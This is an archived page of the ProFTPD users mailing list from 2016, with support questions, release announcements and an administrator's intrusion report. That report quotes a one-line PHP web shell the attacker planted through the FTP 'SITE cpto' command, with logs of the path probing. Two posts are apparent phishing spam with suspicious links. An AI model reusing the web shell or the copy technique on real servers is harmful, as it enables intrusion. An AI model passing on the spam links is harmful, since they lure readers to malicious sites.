Markus Schmidt | 19 May 18:17 2016
Picon

[Proftpd-user] Leaking systemd-logind sessions

Hi,

I have two fully patched CentOS 7 servers hosting nothing but ProFTPD 1.3.5a. 

On both machines, the number of logind sessions is steadily increasing. As soon as some 15000 sessions is
reached, login attempts fail from time to time due to running out of space in /run.

Any idea what could cause this issue? 

Some more information:

Non-active sessions all look like this one, i.e. they are all "closing":
loginctl session-status  183656
183656 - my-ftp-user (1006)
           Since: Sat 2016-05-07 06:15:12 CEST; 1 weeks 5 days ago
          Leader: 29393
             TTY: /dev/ftpd29393
          Remote: my-ftp-user <at> customer.ip
         Service: proftpd; type tty; class user
           State: closing
            Unit: session-183656.scope

There are no running processes in these sessions.

When searching through /var/log/messages, this is what I get for the last few days for one of the servers:
about 250000 occurrences of "system-logind: New session"
about 248000 occurrences of "system-logind: Removed session"
about +2000 increase in loginctl | wc -l

Same pattern on the other server, a little less than 1% of all sessions are left over.
(Continue reading)

mysql.jorge | 8 May 13:29 2016
Picon

[Proftpd-user] Fw: new message

Hello!

 

You have a new message, please read http://carebuildersathomemn.com/confuse.php

 

mysql.jorge <at> decimal.pt

------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html
mysql.jorge | 8 May 13:22 2016
Picon

[Proftpd-user] Fw: new message

Hello!

 

You have a new message, please read http://yatirimgundem.com/intact.php

 

mysql.jorge <at> decimal.pt

------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html
- - | 25 Apr 16:48 2016

[Proftpd-user] After building proftpd, passwords fail to log in

I have built proftpd from source, and having a problem with passwords.  All accounts fail with incorrect passwords, even though I know that they passwords are correct.  I am building proftpd as follows:


install_user=whb3bqj install_group=gic ./configure --prefix=/home/whb3bqj/proftpd/usr --sysconfdir=/home/whb3bqj/proftpd/etc --localstatedir=/home/whb3bqj/proftpd/var LIBS=-lodbc --with-modules=mod_sql:mod_sql_odbc:mod_sftp


Suggestions appreciated.


--

Geoffrey Myers

------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html
Ariel Mannelli | 22 Apr 17:55 2016
Picon

[Proftpd-user] Problem login from localhost

Hello everyone!

I have a ProFTP running on a Debian machine. Works fine trought wan connection, but I recieve a "incorrect password" login from localhost or trough the lan.

Users are on AD server.

any clue??

Many thnks!
--
Ariel Mannelli

------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html
Lists | 12 Apr 19:43 2016

[Proftpd-user] Compile error

I'm trying to compile proftpd with odbc/sql support.  I'm receiving the following error:

undefined reference to SQLGetDiagRec

Any suggestions would be appreciated. 

This is on Red Hat el 5.11

--
Geoffrey Myers

------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html

Tomasz Chmielewski | 7 Apr 17:54 2016

[Proftpd-user] proftpd 1.3.5 vulnerable?

Running proftpd on Ubuntu 14.04.4 LTS with the latest updates installed 
as of today.

   proftpd-basic                    1.3.5~rc3-2.1ubuntu2                  
  amd64

Found a weird file:

# ls -la /tmp|grep eval
-rw-r--r--  1 proftpd  nogroup       85 Apr  7 14:21 .<?php 
eval($_REQUEST[cmd]); echo GOOD;?>

# cat /tmp/.*eval*
proftpd: 80.110.39.36:56405: SITE cpto /tmp/.<?php eval($_REQUEST[cmd]); 
echo GOOD;?>

There are no anonymous users, there is no trace in the logs about any 
valid user logging in around 14:21, Apr 7.

Except these:

2016-04-07 14:19:52,570 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): FTP session opened.
2016-04-07 14:19:52,997 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): error opening destination file 
'/var/html/image/infos.php' for copying: No such file or directory
2016-04-07 14:19:53,428 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): error opening destination file 
'/var/html/images/infos.php' for copying: No such file or directory
2016-04-07 14:19:53,820 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): error opening destination file 
'/var/html/img/infos.php' for copying: No such file or directory
2016-04-07 14:19:54,302 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): error opening destination file 
'/var/www/image/infos.php' for copying: No such file or directory
2016-04-07 14:19:54,882 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): error opening destination file 
'/var/www/images/infos.php' for copying: No such file or directory
2016-04-07 14:19:55,403 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): error opening destination file 
'/var/www/img/infos.php' for copying: No such file or directory
(...)
2016-04-07 14:21:59,207 server proftpd[7263] 10.11.12.13 
(80.110.39.36[80.110.39.36]): FTP session closed.

And the list goes on. It only logs about the files it didn't find; it 
doesn't log about the files it did found or uploaded - apparently the 
attacker had access to the whole server as "proftpd" user.

Is it a known problem? For now, switched off proftpd.

Tomasz Chmielewski
http://wpkg.org

------------------------------------------------------------------------------
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html

TJ Saunders | 31 Mar 17:47 2016
Gravatar

[Proftpd-user] Testers for an AWS-specific module for ProFTPD?


I've been perusing posts on StackOverflow and related sites lately, and
have seen many folks having issues with running proftpd on an EC2
instance in AWS.  Mostly this relates to FTP's multiple TCP connection,
and the usual router/NAT/firewall fun required to make the data
transfers work.

To try to help these folks, I wrote up a ProFTPD AWS howto:

  http://www.proftpd.org/docs/howto/AWS.html

and a mod_aws module, which can (hopefully) suggest necessary config
changes (or make them itself); see:

  https://github.com/Castaglia/proftpd-mod_aws/

It's a work-in-progress, of course; you can see existing feature
requests/bugs filed that I need to fix:

  https://github.com/Castaglia/proftpd-mod_aws/issues

But I feel that mod_aws is at a point now where having a few other folks
try it out (assuming you use AWS), help shake out more issues and make
it more production-ready, would be quite useful.  So if you use ProFTPD
on EC2 instances in AWS, and would like to help out, please try out the
module, let me know how it goes.

Cheers,
TJ

------------------------------------------------------------------------------
Transform Data into Opportunity.
Accelerate data analysis in your applications with
Intel Data Analytics Acceleration Library.
Click to learn more.
http://pubads.g.doubleclick.net/gampad/clk?id=278785471&iu=/4140
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html

Matus UHLAR - fantomas | 22 Mar 01:15 2016
Picon

[Proftpd-user] geoip on debian wheezy

Hello,

anyone used mod_geopi on debian wheezy?
I have tried to turn it on, but the debug log doesn't show anything about it
working:

LoadModule mod_geoip.c
GeoIPEngine on

GeoIPLog /var/log/proftpd/geoip.log
GeoIPTable /usr/share/GeoIP/GeoIP.dat MemoryCache UTF8
GeoIPAllowFilter CountryCode (SK)

(GeoIPPolicy is not available yet).

whenI log on (SSL) I only see these logs related to geoip:

cloud.zvjs.sk proftpd[19472]: loading 'mod_geoip.c'
...
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: GeoIPEngine
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: GeoIPLog
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: GeoIPTable
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: GeoIPAllowFilter
...
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: mod_geoip/0.3: loading static GeoIP tables
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: ROOT PRIVS at mod_geoip.c:353
cloud.zvjs.sk proftpd[19472] cloud.zvjs.sk: RELINQUISH PRIVS at mod_geoip.c:355
...
connect:
...
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]): ROOT PRIVS at mod_geoip.c:1122
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]): RELINQUISH
PRIVS at mod_geoip.c:1124
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]):
mod_geoip/0.3: loading session GeoIP tables
...
auth tls, login, pass
...
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]): GeoIPEngine
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]): GeoIPLog
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]): GeoIPTable
cloud.zvjs.sk proftpd[19474] cloud.zvjs.sk (fantomas.fantomas.sk[62.168.95.114]): GeoIPAllowFilter

any idea where could the problem be?

--

-- 
Matus UHLAR - fantomas, uhlar <at> fantomas.sk ; http://www.fantomas.sk/
Warning: I wish NOT to receive e-mail advertising to this address.
Varovanie: na tuto adresu chcem NEDOSTAVAT akukolvek reklamnu postu.
How does cat play with mouse? cat /dev/mouse

------------------------------------------------------------------------------
Transform Data into Opportunity.
Accelerate data analysis in your applications with
Intel Data Analytics Acceleration Library.
Click to learn more.
http://pubads.g.doubleclick.net/gampad/clk?id=278785351&iu=/4140
_______________________________________________
ProFTPD Users List   <proftpd-users <at> proftpd.org>
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html

TJ Saunders | 11 Mar 02:54 2016
Gravatar

[Proftpd-user] ProFTPD 1.3.6rc2 released!


Hello, ProFTPD community. The ProFTPD Project team is pleased to
announce that the second release candidate for ProFTPD 1.3.6 is now
available for public consumption.

You can download 1.3.6rc2, including PGP signatures and MD5 sums, from
the alternate download site, hosted by GitHub:

  https://github.com/proftpd/proftpd/archive/v1.3.6rc2.tar.gz

Alternatively, you can download proftpd from the main site:

  ftp://ftp.proftpd.org/distrib/source

RPMs, once available, will be placed here:

  ftp://ftp.proftpd.org/distrib/packages/RPMS

The 1.3.6rc2 release includes major new features and numerous bugfixes,
including:

  + Support for TLS session tickets and OCSP stapling
  + Multi-factor authentication via the new mod_auth_otp module
  + Support for the HASH command via the new mod_digest, for file
    checksums

Please read the included NEWS, RELEASE_NOTES, and ChangeLog files for
the full details.

The MD5 sum for the source tarball is:

  8234dfd6d975d3ae77525696af289c08  proftpd-1.3.6rc2.tar.gz

The PGP signature for the source tarball is:

  proftpd-1.3.6rc2.tar.gz:

    
TJ Saunders | 11 Mar 02:53 2016
Gravatar

[Proftpd-user] ProFTPD 1.3.5b released!


Hello, ProFTPD community. The ProFTPD Project team is pleased to
announce
that the second maintenance release for ProFTPD 1.3.5 is now available
for
public consumption.

You can download 1.3.5b, including PGP signatures and MD5 sums, from
the alternate download site, hosted by GitHub:

  https://github.com/proftpd/proftpd/archive/v1.3.5b.tar.gz

Alternatively, you can download proftpd from the main site:

  ftp://ftp.proftpd.org/distrib/source

RPMs, once available, will be placed here:

  ftp://ftp.proftpd.org/distrib/packages/RPMS

The 1.3.5b release is a maintenance release, containing various fixes
backported from the 1.3.6 development cycle.

Please read the included NEWS and ChangeLog files for the full details.

The MD5 sum for the source tarball is:

  f7b8e3a383b34a894c2502db74ccccde  proftpd-1.3.5b.tar.gz

The PGP signature for the source tarball is:

  proftpd-1.3.5b.tar.gz:

    

Gmane